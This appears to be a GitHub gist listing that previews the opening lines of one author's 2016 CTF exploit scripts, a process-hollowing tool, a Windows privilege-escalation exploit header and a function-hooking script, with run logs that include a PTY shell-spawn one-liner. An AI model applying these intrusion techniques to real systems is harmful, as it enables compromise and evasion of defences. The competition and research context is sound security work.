crazy hugsy hugsy
hugsy
/ heapfun4u.py
Created
May 23, 2016 23:44
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # | |
| # DEFCON CTF 2016 - heapfun4u | |
| # | |
| # @_hugsy_ | |
| # | |
| import socket, struct, sys, telnetlib, binascii | |
| HOST = "heapfun4u_873c6d81dd688c9057d5b229cf80579e.quals.shallweplayaga.me" | |
| HOST = "172.28.128.4" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # | |
| # feedme challenge | |
| # defcon ctf 2016 | |
| # | |
| # @_hugsy_ | |
| # | |
| import socket, struct, sys, telnetlib, binascii | |
| HOST = "feedme_47aa9b0d8ad186754acd4bece3d6a177.quals.shallweplayaga.me" |
hugsy
/ gef-exploit.py
Last active
March 24, 2021 06:03
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # | |
| # ASIS CTF 2016 | |
| # feap | |
| # | |
| # @_hugsy_ | |
| # | |
| # $ ./gef-exploit.py (13:55) | |
| # [+] Connected to feap.asis-ctf.ir:7331 | |
| # [+] Leaking addresses |
hugsy
/ gef-exploit.py
Last active
October 3, 2016 14:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # | |
| # ASIS CTF 2016 | |
| # b00ks - pwn 146 | |
| # | |
| # | |
| import socket, struct, sys, telnetlib, binascii | |
| HOST = "books.asis-ctf.ir" | |
| HOST = "172.28.128.3" |
hugsy
/ no-ptrace.c
Created
April 27, 2016 22:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <unistd.h> | |
| #include <sys/ptrace.h> | |
| #include <sys/types.h> | |
| #include <sys/mman.h> | |
| #include <string.h> | |
| #define MSG "ptrace protected" | |
| int main(int argc, char** argv, char** envp) |
hugsy
/ ProcessHollower.c
Created
April 25, 2016 11:00
ProcessHollower: Hide a executable inside the runtime of another one
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * | |
| * ProcessHollower: Hide a executable inside the runtime of another one | |
| * | |
| * Compile with | |
| * C:> cl.exe ProcessHollower.c | |
| * | |
| * Execute with: | |
| * C:> ProcessHollower.exe notepad.exe myevilbinary.exe | |
| * |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * Curated exploit of @tirranido leaked handle race condition | |
| * | |
| * Tested on | |
| * - Win7 x64 | |
| * - Win8.1 x64 | |
| * - Win10 x64 | |
| * | |
| * Ref: https://googleprojectzero.blogspot.com.au/2016/03/exploiting-leaked-thread-handle.html | |
| * @_hugsy_ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # [+] Connected to problems2.2016q1.sctf.io:1339 | |
| # Attach with GDB and hit Enter | |
| # [+] Filling up threads | |
| # [+] threads[0].next=0xbfd78e3d | |
| # [+] all_threads=0xbfd78dec | |
| # [+] new_thread=0xbfd81aec | |
| # [+] canary_addr=0xbfd81f54 | |
| # [+] retaddr=0xbfd81f5c | |
| # [+] set_last_chunk_next_address(0xbfd81ee0) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # | |
| # | |
| # hugsy:~/downloads/_pwn2 $ ./gef-exploit.py (13:23) | |
| # [+] Connected to problems2.2016q1.sctf.io:1338 | |
| # Attach with GDB and hit Enter | |
| # [+] Crafting payload | |
| # [+] Sent 256 bytes | |
| # [+] Got it, interacting (Ctrl-C to break) | |
| # [+] Get a PTY with ' python -c "import pty;pty.spawn('/bin/bash')" ' |
hugsy
/ hook_dump_files.py
Created
April 11, 2016 07:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # easy function hooking in process | |
| # | |
| from winappdbg import Process, Debug, EventHandler | |
| import sys | |
| PAGE_EXECUTE = 0x10 | |
| PAGE_EXECUTE_READ = 0x20 | |
| PAGE_EXECUTE_READWRITE = 0x40 | |
| PAGE_EXECUTE_WRITECOPY = 0x80 |